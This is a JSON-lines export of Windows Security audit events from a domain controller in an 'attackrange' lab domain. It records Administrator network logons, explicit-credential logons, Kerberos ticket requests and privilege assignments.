{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220351,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CA5C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ca5c","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220352,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220353,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220354,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220355,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CA96\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ca96","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220356,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CA96\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4ca96","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220357,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220358,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220359,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220360,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CD63\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4cd63","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220361,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CD63\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4cd63","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220362,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220363,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
